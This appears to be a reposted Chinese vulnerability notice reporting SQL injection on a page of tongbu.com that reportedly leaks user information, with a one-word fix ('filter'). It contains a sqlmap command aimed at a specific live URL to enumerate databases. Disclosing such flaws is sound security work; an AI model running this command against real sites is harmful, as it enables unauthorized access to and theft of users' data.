同步网某分站存在sql注入下载

同步网某页面SQL注入漏洞(泄漏用户各种信息)

D:\Python>python.exe e:\Tools\sqlmap\sqlmap.py -u "http://app.tongbu.com/gift/li

st.html?key=*" --dbs --level 3

修复方案:

过滤

当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细